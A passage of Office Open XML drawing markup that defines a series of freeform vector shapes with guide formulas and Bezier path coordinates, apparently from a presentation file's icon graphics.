            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 180 w 205"/>
                <a:gd name="T1" fmla="*/ 738 h 738"/>
                <a:gd name="T2" fmla="*/ 25 w 205"/>
                <a:gd name="T3" fmla="*/ 738 h 738"/>
                <a:gd name="T4" fmla="*/ 0 w 205"/>
                <a:gd name="T5" fmla="*/ 713 h 738"/>
                <a:gd name="T6" fmla="*/ 0 w 205"/>
                <a:gd name="T7" fmla="*/ 25 h 738"/>
                <a:gd name="T8" fmla="*/ 25 w 205"/>
                <a:gd name="T9" fmla="*/ 0 h 738"/>
                <a:gd name="T10" fmla="*/ 50 w 205"/>
                <a:gd name="T11" fmla="*/ 25 h 738"/>
                <a:gd name="T12" fmla="*/ 50 w 205"/>
                <a:gd name="T13" fmla="*/ 688 h 738"/>
                <a:gd name="T14" fmla="*/ 155 w 205"/>
                <a:gd name="T15" fmla="*/ 688 h 738"/>
                <a:gd name="T16" fmla="*/ 155 w 205"/>
                <a:gd name="T17" fmla="*/ 255 h 738"/>
                <a:gd name="T18" fmla="*/ 180 w 205"/>
                <a:gd name="T19" fmla="*/ 230 h 738"/>
                <a:gd name="T20" fmla="*/ 205 w 205"/>
                <a:gd name="T21" fmla="*/ 255 h 738"/>
                <a:gd name="T22" fmla="*/ 205 w 205"/>
                <a:gd name="T23" fmla="*/ 713 h 738"/>
                <a:gd name="T24" fmla="*/ 180 w 205"/>
                <a:gd name="T25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738">
                  <a:moveTo>
                    <a:pt x="180" y="738"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="738"/>
                    <a:pt x="25" y="738"/>
                    <a:pt x="25" y="738"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="738"/>
                    <a:pt x="0" y="727"/>
                    <a:pt x="0" y="71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5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="688"/>
                    <a:pt x="50" y="688"/>
                    <a:pt x="50" y="688"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="688"/>
                    <a:pt x="155" y="688"/>
                    <a:pt x="155" y="688"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="255"/>
                    <a:pt x="155" y="255"/>
                    <a:pt x="155" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="241"/>
                    <a:pt x="166" y="230"/>
                    <a:pt x="180" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="230"/>
                    <a:pt x="205" y="241"/>
                    <a:pt x="205" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="713"/>
                    <a:pt x="205" y="713"/>
                    <a:pt x="205" y="713"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="727"/>
                    <a:pt x="194" y="738"/>
                    <a:pt x="180" y="7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60" name="Freeform 217">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C687330A-1032-464D-9B63-5A980D782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7589" y="1098551"/>
              <a:ext cx="150813" cy="36513"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 28 w 362"/>
                <a:gd name="T1" fmla="*/ 86 h 86"/>
                <a:gd name="T2" fmla="*/ 4 w 362"/>
                <a:gd name="T3" fmla="*/ 69 h 86"/>
                <a:gd name="T4" fmla="*/ 20 w 362"/>
                <a:gd name="T5" fmla="*/ 37 h 86"/>
                <a:gd name="T6" fmla="*/ 341 w 362"/>
                <a:gd name="T7" fmla="*/ 32 h 86"/>
                <a:gd name="T8" fmla="*/ 358 w 362"/>
                <a:gd name="T9" fmla="*/ 64 h 86"/>
                <a:gd name="T10" fmla="*/ 327 w 362"/>
                <a:gd name="T11" fmla="*/ 80 h 86"/>
                <a:gd name="T12" fmla="*/ 36 w 362"/>
                <a:gd name="T13" fmla="*/ 84 h 86"/>
                <a:gd name="T14" fmla="*/ 28 w 362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2" h="86">
                  <a:moveTo>
                    <a:pt x="28" y="86"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="86"/>
                    <a:pt x="8" y="79"/>
                    <a:pt x="4" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="56"/>
                    <a:pt x="7" y="41"/>
                    <a:pt x="20" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="1"/>
                    <a:pt x="237" y="0"/>
                    <a:pt x="341" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="355" y="36"/>
                    <a:pt x="362" y="50"/>
                    <a:pt x="358" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="77"/>
                    <a:pt x="340" y="84"/>
                    <a:pt x="327" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="51"/>
                    <a:pt x="129" y="52"/>
                    <a:pt x="36" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="85"/>
                    <a:pt x="31" y="86"/>
                    <a:pt x="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61" name="Freeform 218">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1154FB5-453B-5A41-8CFF-3D96E6938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0601" y="1128713"/>
              <a:ext cx="46038" cy="252413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 88 w 113"/>
                <a:gd name="T1" fmla="*/ 605 h 605"/>
                <a:gd name="T2" fmla="*/ 25 w 113"/>
                <a:gd name="T3" fmla="*/ 605 h 605"/>
                <a:gd name="T4" fmla="*/ 0 w 113"/>
                <a:gd name="T5" fmla="*/ 580 h 605"/>
                <a:gd name="T6" fmla="*/ 0 w 113"/>
                <a:gd name="T7" fmla="*/ 155 h 605"/>
                <a:gd name="T8" fmla="*/ 18 w 113"/>
                <a:gd name="T9" fmla="*/ 20 h 605"/>
                <a:gd name="T10" fmla="*/ 50 w 113"/>
                <a:gd name="T11" fmla="*/ 5 h 605"/>
                <a:gd name="T12" fmla="*/ 65 w 113"/>
                <a:gd name="T13" fmla="*/ 38 h 605"/>
                <a:gd name="T14" fmla="*/ 50 w 113"/>
                <a:gd name="T15" fmla="*/ 155 h 605"/>
                <a:gd name="T16" fmla="*/ 50 w 113"/>
                <a:gd name="T17" fmla="*/ 555 h 605"/>
                <a:gd name="T18" fmla="*/ 88 w 113"/>
                <a:gd name="T19" fmla="*/ 555 h 605"/>
                <a:gd name="T20" fmla="*/ 113 w 113"/>
                <a:gd name="T21" fmla="*/ 580 h 605"/>
                <a:gd name="T22" fmla="*/ 88 w 113"/>
                <a:gd name="T23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605">
                  <a:moveTo>
                    <a:pt x="88" y="605"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="605"/>
                    <a:pt x="25" y="605"/>
                    <a:pt x="25" y="605"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="605"/>
                    <a:pt x="0" y="594"/>
                    <a:pt x="0" y="58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47"/>
                    <a:pt x="0" y="65"/>
                    <a:pt x="18" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="7"/>
                    <a:pt x="37" y="0"/>
                    <a:pt x="50" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="11"/>
                    <a:pt x="70" y="25"/>
                    <a:pt x="65" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="69"/>
                    <a:pt x="50" y="133"/>
                    <a:pt x="50" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="555"/>
                    <a:pt x="50" y="555"/>
                    <a:pt x="50" y="555"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="555"/>
                    <a:pt x="88" y="555"/>
                    <a:pt x="88" y="555"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="555"/>
                    <a:pt x="113" y="567"/>
                    <a:pt x="113" y="580"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="594"/>
                    <a:pt x="102" y="605"/>
                    <a:pt x="88" y="6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62" name="Freeform 219">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA5C473A-725E-8044-8BB3-72D435C5D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0014" y="1195388"/>
              <a:ext cx="109538" cy="358775"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 238 w 263"/>
                <a:gd name="T1" fmla="*/ 861 h 861"/>
                <a:gd name="T2" fmla="*/ 83 w 263"/>
                <a:gd name="T3" fmla="*/ 861 h 861"/>
                <a:gd name="T4" fmla="*/ 58 w 263"/>
                <a:gd name="T5" fmla="*/ 836 h 861"/>
                <a:gd name="T6" fmla="*/ 58 w 263"/>
                <a:gd name="T7" fmla="*/ 50 h 861"/>
                <a:gd name="T8" fmla="*/ 25 w 263"/>
                <a:gd name="T9" fmla="*/ 50 h 861"/>
                <a:gd name="T10" fmla="*/ 0 w 263"/>
                <a:gd name="T11" fmla="*/ 25 h 861"/>
                <a:gd name="T12" fmla="*/ 25 w 263"/>
                <a:gd name="T13" fmla="*/ 0 h 861"/>
                <a:gd name="T14" fmla="*/ 83 w 263"/>
                <a:gd name="T15" fmla="*/ 0 h 861"/>
                <a:gd name="T16" fmla="*/ 108 w 263"/>
                <a:gd name="T17" fmla="*/ 25 h 861"/>
                <a:gd name="T18" fmla="*/ 108 w 263"/>
                <a:gd name="T19" fmla="*/ 811 h 861"/>
                <a:gd name="T20" fmla="*/ 238 w 263"/>
                <a:gd name="T21" fmla="*/ 811 h 861"/>
                <a:gd name="T22" fmla="*/ 263 w 263"/>
                <a:gd name="T23" fmla="*/ 836 h 861"/>
                <a:gd name="T24" fmla="*/ 238 w 263"/>
                <a:gd name="T25" fmla="*/ 861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3" h="861">
                  <a:moveTo>
                    <a:pt x="238" y="861"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="861"/>
                    <a:pt x="83" y="861"/>
                    <a:pt x="83" y="861"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="861"/>
                    <a:pt x="58" y="850"/>
                    <a:pt x="58" y="836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97" y="0"/>
                    <a:pt x="108" y="11"/>
                    <a:pt x="108" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="811"/>
                    <a:pt x="108" y="811"/>
                    <a:pt x="108" y="811"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="811"/>
                    <a:pt x="238" y="811"/>
                    <a:pt x="238" y="811"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="811"/>
                    <a:pt x="263" y="822"/>
                    <a:pt x="263" y="836"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="263" y="850"/>
                    <a:pt x="252" y="861"/>
                    <a:pt x="238" y="8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63" name="Freeform 220">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FC23E53-3D00-6B4A-8D62-2B495F5E6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8914" y="1250951"/>
              <a:ext cx="85725" cy="303213"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 180 w 205"/>
                <a:gd name="T1" fmla="*/ 728 h 728"/>
                <a:gd name="T2" fmla="*/ 25 w 205"/>
                <a:gd name="T3" fmla="*/ 728 h 728"/>
                <a:gd name="T4" fmla="*/ 0 w 205"/>
                <a:gd name="T5" fmla="*/ 703 h 728"/>
                <a:gd name="T6" fmla="*/ 0 w 205"/>
                <a:gd name="T7" fmla="*/ 245 h 728"/>
                <a:gd name="T8" fmla="*/ 25 w 205"/>
                <a:gd name="T9" fmla="*/ 220 h 728"/>
                <a:gd name="T10" fmla="*/ 50 w 205"/>
                <a:gd name="T11" fmla="*/ 245 h 728"/>
                <a:gd name="T12" fmla="*/ 50 w 205"/>
                <a:gd name="T13" fmla="*/ 678 h 728"/>
                <a:gd name="T14" fmla="*/ 155 w 205"/>
                <a:gd name="T15" fmla="*/ 678 h 728"/>
                <a:gd name="T16" fmla="*/ 155 w 205"/>
                <a:gd name="T17" fmla="*/ 25 h 728"/>
                <a:gd name="T18" fmla="*/ 180 w 205"/>
                <a:gd name="T19" fmla="*/ 0 h 728"/>
                <a:gd name="T20" fmla="*/ 205 w 205"/>
                <a:gd name="T21" fmla="*/ 25 h 728"/>
                <a:gd name="T22" fmla="*/ 205 w 205"/>
                <a:gd name="T23" fmla="*/ 703 h 728"/>
                <a:gd name="T24" fmla="*/ 180 w 205"/>
                <a:gd name="T25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5" h="728">
                  <a:moveTo>
                    <a:pt x="180" y="728"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="728"/>
                    <a:pt x="25" y="728"/>
                    <a:pt x="25" y="728"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="728"/>
                    <a:pt x="0" y="717"/>
                    <a:pt x="0" y="703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31"/>
                    <a:pt x="11" y="220"/>
                    <a:pt x="25" y="220"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="220"/>
                    <a:pt x="50" y="231"/>
                    <a:pt x="50" y="245"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="678"/>
                    <a:pt x="50" y="678"/>
                    <a:pt x="50" y="678"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="678"/>
                    <a:pt x="155" y="678"/>
                    <a:pt x="155" y="678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11"/>
                    <a:pt x="166" y="0"/>
                    <a:pt x="180" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="0"/>
                    <a:pt x="205" y="11"/>
                    <a:pt x="205" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="703"/>
                    <a:pt x="205" y="703"/>
                    <a:pt x="205" y="703"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="717"/>
                    <a:pt x="194" y="728"/>
                    <a:pt x="180" y="7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64" name="Freeform 221">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5856241-6702-694D-90BD-9FC42F8E5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7001" y="1098551"/>
              <a:ext cx="150813" cy="36513"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 334 w 362"/>
                <a:gd name="T1" fmla="*/ 86 h 86"/>
                <a:gd name="T2" fmla="*/ 325 w 362"/>
                <a:gd name="T3" fmla="*/ 84 h 86"/>
                <a:gd name="T4" fmla="*/ 35 w 362"/>
                <a:gd name="T5" fmla="*/ 80 h 86"/>
                <a:gd name="T6" fmla="*/ 4 w 362"/>
                <a:gd name="T7" fmla="*/ 64 h 86"/>
                <a:gd name="T8" fmla="*/ 20 w 362"/>
                <a:gd name="T9" fmla="*/ 32 h 86"/>
                <a:gd name="T10" fmla="*/ 342 w 362"/>
                <a:gd name="T11" fmla="*/ 37 h 86"/>
                <a:gd name="T12" fmla="*/ 357 w 362"/>
                <a:gd name="T13" fmla="*/ 69 h 86"/>
                <a:gd name="T14" fmla="*/ 334 w 362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2" h="86">
                  <a:moveTo>
                    <a:pt x="334" y="86"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="86"/>
                    <a:pt x="328" y="85"/>
                    <a:pt x="325" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="52"/>
                    <a:pt x="129" y="51"/>
                    <a:pt x="35" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="84"/>
                    <a:pt x="8" y="77"/>
                    <a:pt x="4" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="50"/>
                    <a:pt x="7" y="36"/>
                    <a:pt x="20" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="0"/>
                    <a:pt x="239" y="1"/>
                    <a:pt x="342" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="355" y="41"/>
                    <a:pt x="362" y="56"/>
                    <a:pt x="357" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="79"/>
                    <a:pt x="344" y="86"/>
                    <a:pt x="334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65" name="Freeform 222">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BDD4856-C974-A64F-B3C8-B0E458BB8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7176" y="1130301"/>
              <a:ext cx="47625" cy="250825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 87 w 113"/>
                <a:gd name="T1" fmla="*/ 604 h 604"/>
                <a:gd name="T2" fmla="*/ 25 w 113"/>
                <a:gd name="T3" fmla="*/ 604 h 604"/>
                <a:gd name="T4" fmla="*/ 0 w 113"/>
                <a:gd name="T5" fmla="*/ 579 h 604"/>
                <a:gd name="T6" fmla="*/ 25 w 113"/>
                <a:gd name="T7" fmla="*/ 554 h 604"/>
                <a:gd name="T8" fmla="*/ 62 w 113"/>
                <a:gd name="T9" fmla="*/ 554 h 604"/>
                <a:gd name="T10" fmla="*/ 62 w 113"/>
                <a:gd name="T11" fmla="*/ 164 h 604"/>
                <a:gd name="T12" fmla="*/ 48 w 113"/>
                <a:gd name="T13" fmla="*/ 37 h 604"/>
                <a:gd name="T14" fmla="*/ 62 w 113"/>
                <a:gd name="T15" fmla="*/ 4 h 604"/>
                <a:gd name="T16" fmla="*/ 95 w 113"/>
                <a:gd name="T17" fmla="*/ 19 h 604"/>
                <a:gd name="T18" fmla="*/ 112 w 113"/>
                <a:gd name="T19" fmla="*/ 164 h 604"/>
                <a:gd name="T20" fmla="*/ 112 w 113"/>
                <a:gd name="T21" fmla="*/ 579 h 604"/>
                <a:gd name="T22" fmla="*/ 87 w 113"/>
                <a:gd name="T23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604">
                  <a:moveTo>
                    <a:pt x="87" y="604"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="604"/>
                    <a:pt x="25" y="604"/>
                    <a:pt x="25" y="604"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="604"/>
                    <a:pt x="0" y="593"/>
                    <a:pt x="0" y="579"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="566"/>
                    <a:pt x="11" y="554"/>
                    <a:pt x="25" y="554"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="554"/>
                    <a:pt x="62" y="554"/>
                    <a:pt x="62" y="554"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="164"/>
                    <a:pt x="62" y="164"/>
                    <a:pt x="62" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="139"/>
                    <a:pt x="60" y="68"/>
                    <a:pt x="48" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="24"/>
                    <a:pt x="49" y="10"/>
                    <a:pt x="62" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="0"/>
                    <a:pt x="90" y="6"/>
                    <a:pt x="95" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="64"/>
                    <a:pt x="112" y="154"/>
                    <a:pt x="112" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="579"/>
                    <a:pt x="112" y="579"/>
                    <a:pt x="112" y="579"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="593"/>
                    <a:pt x="101" y="604"/>
                    <a:pt x="87" y="6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66" name="Freeform 223">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8400EA5-DC7E-5E4A-8F25-2140DC9F0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4276" y="1042988"/>
              <a:ext cx="204788" cy="42863"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 29 w 493"/>
                <a:gd name="T1" fmla="*/ 101 h 101"/>
                <a:gd name="T2" fmla="*/ 5 w 493"/>
                <a:gd name="T3" fmla="*/ 84 h 101"/>
                <a:gd name="T4" fmla="*/ 20 w 493"/>
                <a:gd name="T5" fmla="*/ 52 h 101"/>
                <a:gd name="T6" fmla="*/ 472 w 493"/>
                <a:gd name="T7" fmla="*/ 45 h 101"/>
                <a:gd name="T8" fmla="*/ 489 w 493"/>
                <a:gd name="T9" fmla="*/ 77 h 101"/>
                <a:gd name="T10" fmla="*/ 457 w 493"/>
                <a:gd name="T11" fmla="*/ 93 h 101"/>
                <a:gd name="T12" fmla="*/ 37 w 493"/>
                <a:gd name="T13" fmla="*/ 99 h 101"/>
                <a:gd name="T14" fmla="*/ 29 w 493"/>
                <a:gd name="T1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3" h="101">
                  <a:moveTo>
                    <a:pt x="29" y="101"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="101"/>
                    <a:pt x="8" y="94"/>
                    <a:pt x="5" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="71"/>
                    <a:pt x="7" y="57"/>
                    <a:pt x="20" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="2"/>
                    <a:pt x="326" y="0"/>
                    <a:pt x="472" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="486" y="50"/>
                    <a:pt x="493" y="64"/>
                    <a:pt x="489" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="485" y="90"/>
                    <a:pt x="471" y="97"/>
                    <a:pt x="457" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="51"/>
                    <a:pt x="172" y="53"/>
                    <a:pt x="37" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="100"/>
                    <a:pt x="31" y="101"/>
                    <a:pt x="29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67" name="Freeform 224">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C97D7AA-B3C3-9544-8F08-B75FFF768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4576" y="954088"/>
              <a:ext cx="120650" cy="136525"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 146 w 292"/>
                <a:gd name="T1" fmla="*/ 326 h 326"/>
                <a:gd name="T2" fmla="*/ 0 w 292"/>
                <a:gd name="T3" fmla="*/ 180 h 326"/>
                <a:gd name="T4" fmla="*/ 0 w 292"/>
                <a:gd name="T5" fmla="*/ 146 h 326"/>
                <a:gd name="T6" fmla="*/ 22 w 292"/>
                <a:gd name="T7" fmla="*/ 69 h 326"/>
                <a:gd name="T8" fmla="*/ 56 w 292"/>
                <a:gd name="T9" fmla="*/ 61 h 326"/>
                <a:gd name="T10" fmla="*/ 64 w 292"/>
                <a:gd name="T11" fmla="*/ 96 h 326"/>
                <a:gd name="T12" fmla="*/ 50 w 292"/>
                <a:gd name="T13" fmla="*/ 146 h 326"/>
                <a:gd name="T14" fmla="*/ 50 w 292"/>
                <a:gd name="T15" fmla="*/ 180 h 326"/>
                <a:gd name="T16" fmla="*/ 146 w 292"/>
                <a:gd name="T17" fmla="*/ 276 h 326"/>
                <a:gd name="T18" fmla="*/ 242 w 292"/>
                <a:gd name="T19" fmla="*/ 180 h 326"/>
                <a:gd name="T20" fmla="*/ 242 w 292"/>
                <a:gd name="T21" fmla="*/ 146 h 326"/>
                <a:gd name="T22" fmla="*/ 146 w 292"/>
                <a:gd name="T23" fmla="*/ 50 h 326"/>
                <a:gd name="T24" fmla="*/ 102 w 292"/>
                <a:gd name="T25" fmla="*/ 61 h 326"/>
                <a:gd name="T26" fmla="*/ 68 w 292"/>
                <a:gd name="T27" fmla="*/ 50 h 326"/>
                <a:gd name="T28" fmla="*/ 78 w 292"/>
                <a:gd name="T29" fmla="*/ 16 h 326"/>
                <a:gd name="T30" fmla="*/ 146 w 292"/>
                <a:gd name="T31" fmla="*/ 0 h 326"/>
                <a:gd name="T32" fmla="*/ 292 w 292"/>
                <a:gd name="T33" fmla="*/ 146 h 326"/>
                <a:gd name="T34" fmla="*/ 292 w 292"/>
                <a:gd name="T35" fmla="*/ 180 h 326"/>
                <a:gd name="T36" fmla="*/ 146 w 292"/>
                <a:gd name="T37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2" h="326">
                  <a:moveTo>
                    <a:pt x="146" y="326"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="326"/>
                    <a:pt x="0" y="261"/>
                    <a:pt x="0" y="18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19"/>
                    <a:pt x="7" y="92"/>
                    <a:pt x="22" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="58"/>
                    <a:pt x="44" y="54"/>
                    <a:pt x="56" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="68"/>
                    <a:pt x="72" y="84"/>
                    <a:pt x="64" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="111"/>
                    <a:pt x="50" y="128"/>
                    <a:pt x="50" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="180"/>
                    <a:pt x="50" y="180"/>
                    <a:pt x="50" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="233"/>
                    <a:pt x="93" y="276"/>
                    <a:pt x="146" y="276"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="276"/>
                    <a:pt x="242" y="233"/>
                    <a:pt x="242" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="242" y="146"/>
                    <a:pt x="242" y="146"/>
                    <a:pt x="242" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="242" y="93"/>
                    <a:pt x="199" y="50"/>
                    <a:pt x="146" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="50"/>
                    <a:pt x="115" y="54"/>
                    <a:pt x="102" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="67"/>
                    <a:pt x="74" y="63"/>
                    <a:pt x="68" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="38"/>
                    <a:pt x="66" y="23"/>
                    <a:pt x="78" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="6"/>
                    <a:pt x="123" y="0"/>
                    <a:pt x="146" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="0"/>
                    <a:pt x="292" y="66"/>
                    <a:pt x="292" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292" y="180"/>
                    <a:pt x="292" y="180"/>
                    <a:pt x="292" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292" y="261"/>
                    <a:pt x="227" y="326"/>
                    <a:pt x="146" y="3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68" name="Freeform 225">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{241C0F18-E19B-3D40-90FD-C1747A360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8589" y="954088"/>
              <a:ext cx="122238" cy="136525"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 147 w 293"/>
                <a:gd name="T1" fmla="*/ 326 h 326"/>
                <a:gd name="T2" fmla="*/ 0 w 293"/>
                <a:gd name="T3" fmla="*/ 180 h 326"/>
                <a:gd name="T4" fmla="*/ 0 w 293"/>
                <a:gd name="T5" fmla="*/ 146 h 326"/>
                <a:gd name="T6" fmla="*/ 22 w 293"/>
                <a:gd name="T7" fmla="*/ 69 h 326"/>
                <a:gd name="T8" fmla="*/ 57 w 293"/>
                <a:gd name="T9" fmla="*/ 61 h 326"/>
                <a:gd name="T10" fmla="*/ 65 w 293"/>
                <a:gd name="T11" fmla="*/ 96 h 326"/>
